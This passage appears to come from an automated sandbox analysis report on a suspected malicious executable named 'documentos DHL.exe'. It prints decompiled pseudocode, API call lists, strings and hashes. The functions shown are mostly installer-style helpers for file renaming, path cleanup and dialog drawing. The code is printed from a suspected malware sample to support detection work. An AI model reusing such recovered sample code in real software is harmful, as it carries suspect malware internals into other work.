								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405EA2(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426dc8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405ffc
0x00406005
0x0040600c
0x00406016
0x0040602a
0x00406052
0x0040605d
0x00406061
0x00406081
0x00406088
0x00406092
0x0040609f
0x004060a4
0x004060a9
0x004060ad
0x004060bc
0x004060be
0x004060cb
0x004060cf
0x0040616a
0x00000000
0x004060e5
0x004060f2
0x00406116
0x0040611a
0x00406139
0x0040613d
0x0040613d
0x0040613f
0x00406148
0x00406153
0x0040615e
0x00406164
0x00000000
0x00406164
0x0040611c
0x0040611f
0x0040612a
0x00406126
0x00406128
0x00406129
0x00406129
0x00406131
0x00406133
0x00000000
0x00406133
0x004060fd
0x00406103
0x00000000
0x00406103
0x004060cf
0x004060ad
0x0040602c
0x00406037
0x00406040
0x00406044
0x00000000
0x00000000
0x00406044
0x00406175

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406197,?,?), ref: 00406037
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406040

Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
Part of subcall function 00405E07: lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 0040605D
wsprintfA.USER32 ref: 0040607B
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060B6
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060C5
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
GlobalFree.KERNEL32(00000000), ref: 00406164
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B

Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\documentos DHL.exe,80000000,00000003), ref: 00405EA6
Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

Strings

[Rename], xrefs: 004060E5, 004060F7
%ls=%ls, xrefs: 00406071

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD

Uniqueness

Uniqueness Score: -1.00%

Function 00406644 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406644(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405CF8(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405CAE(L"*?|<>/\":", _t5))) == 0) {
							E00405E5D(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406646
0x0040664f
0x00406666
0x00406666
0x0040666d
0x00406679
0x00406679
0x0040667c
0x0040667f
0x00406684
0x00406686
0x0040668f
0x00406693
0x004066b0
0x004066b8
0x004066b8
0x004066bd
0x004066bf
0x004066c2
0x004066c7
0x004066c8
0x004066cc
0x004066cc
0x004066cd
0x004066d4
0x004066d6
0x004066dd
0x00000000
0x00000000
0x004066e5
0x004066eb
0x00000000
0x00000000
0x00000000
0x004066eb
0x004066f0

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documentos DHL.exe",00403464,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documentos DHL.exe",00403464,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\documentos DHL.exe",00403464,C:\Users\user\AppData\Local\Temp\,76523420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE

Strings

*?|<>/":, xrefs: 00406696
"C:\Users\user\Desktop\documentos DHL.exe", xrefs: 00406644
C:\Users\user\AppData\Local\Temp\, xrefs: 00406645, 0040664A

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\documentos DHL.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3352687050
Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD

Uniqueness

Uniqueness Score: -1.00%

Function 004043AC Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004043AC(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x004043be
0x00404452
0x00000000
0x00404452
0x004043cf
0x004043d3
0x00000000
0x00000000
0x004043d9
0x004043e2
0x004043e5
0x004043e5
0x004043eb
0x004043f1
0x004043f1
0x004043fd
0x00404403
0x0040440a
0x0040440d
0x00404410
0x00404412
0x00404412
0x0040441a
0x00404420
0x00404420
0x0040442a
0x0040442f
0x00404432
0x00404437
0x0040443a
0x0040443a
0x0040444a
0x0040444a
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043C9
GetSysColor.USER32(00000000), ref: 004043E5
SetTextColor.GDI32(?,00000000), ref: 004043F1
SetBkMode.GDI32(?,?), ref: 004043FD
GetSysColor.USER32(?), ref: 00404410
SetBkColor.GDI32(?,?), ref: 00404420
DeleteObject.GDI32(?), ref: 0040443A
CreateBrushIndirect.GDI32(?), ref: 00404444

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405414 Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405414(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429224;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004063D2(_t38, 0, 0x422708, 0x422708, _a4);
					}
					_t27 = lstrlenW(0x422708);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429208, 0x422708);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422708;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422708[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422708, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x0040541a
0x00405424
0x00405429
0x0040542f
0x0040543a
0x0040543d
0x00405440
0x00405446
0x00405446
0x0040544c
0x00405454
0x00405457
0x00405474
0x00405478
0x00405481
0x00405481
0x0040548b
0x00405494
0x004054a0
0x004054a7
0x004054ab
0x004054ae
0x004054c1
0x004054cf
0x004054cf
0x004054d3
0x004054d5
0x004054d8
0x00000000
0x004054d8
0x00405459
0x00405461
0x00405469
0x0040546f
0x00000000
0x0040546f
0x00405469
0x00405457
0x004054e4

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
SetWindowTextW.USER32(00422708,00422708), ref: 00405481
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402E72 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E72(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x418edc; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x418edc = 0;
					return _t15;
				}
				__eflags =  *0x418edc; // 0x0
				if(__eflags != 0) {
					return E004067C6(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x42a250;
				if(_t6 >  *0x42a250) {
					__eflags =  *0x42a248;
					if( *0x42a248 == 0) {
						_t7 = CreateDialogParamW( *0x42a240, 0x6f, 0, E00402DD7, 0);
						 *0x418edc = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x42a314 & 0x00000001;
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00402E56());
						return E00405414(0,  &_v132);
					}
				}
				return _t6;
			}

0x00402e81
0x00402e83
0x00402e8a
0x00402e8d
0x00402e8d
0x00402e93
0x00000000
0x00402e93
0x00402e9b
0x00402ea1
0x00000000
0x00402ea4
0x00402eab
0x00402eb1
0x00402eb7
0x00402eb9
0x00402ebf
0x00402efd
0x00402f06
0x00000000
0x00402f0b
0x00402ec1
0x00402ec8
0x00402ed9
0x00000000
0x00402ee7
0x00402ec8
0x00402f13

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
GetTickCount.KERNEL32 ref: 00402EAB
wsprintfW.USER32 ref: 00402ED9

Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
ShowWindow.USER32(00000000,00000005), ref: 00402F0B

Part of subcall function 00402E56: MulDiv.KERNEL32(00000000,00000064,00003FBC), ref: 00402E6B

Strings

... %d%%, xrefs: 00402ED3

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
Opcode Fuzzy Hash: 9d96e1b775b00f8f1aa504ccf668d13eff31e418fbd4a6343fc61565dbea9545
Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404CDE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CDE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404cec
0x00404cf9
0x00404cff
0x00404d3d
0x00404d3d
0x00404d4c
0x00404d53
0x00000000
0x00404d55
0x00404d01
0x00404d10
0x00404d18
0x00404d1b
0x00404d2d
0x00404d33
0x00404d3a
0x00000000
0x00404d3a
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
GetMessagePos.USER32 ref: 00404D01
ScreenToClient.USER32(?,?), ref: 00404D1B
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53

Strings

f, xrefs: 00404D2F

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cdf0 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdf7 = 1;
				 *0x40cdf4 = _t15 & 0x00000001;
				 *0x40cdf5 = _t15 & 0x00000002;
				 *0x40cdf6 = _t15 & 0x00000004;
				E004063D2(_t9, _t31, _t33, "Times New Roman",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cde0);
				_push(_t18);
				_push(_t33);
				E004062F7();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401db3
0x00401dbe
0x00401dc0
0x00401dcd
0x00401de4
0x00401de9
0x00401df6
0x00401dfb
0x00401dff
0x00401e0a
0x00401e11
0x00401e23
0x00401e29
0x00401e2e
0x00401e38
0x0040258c
0x0040156d
0x00402a65
0x00402ac2
0x00402ace

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38

Strings

Times New Roman, xrefs: 00401E1E

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
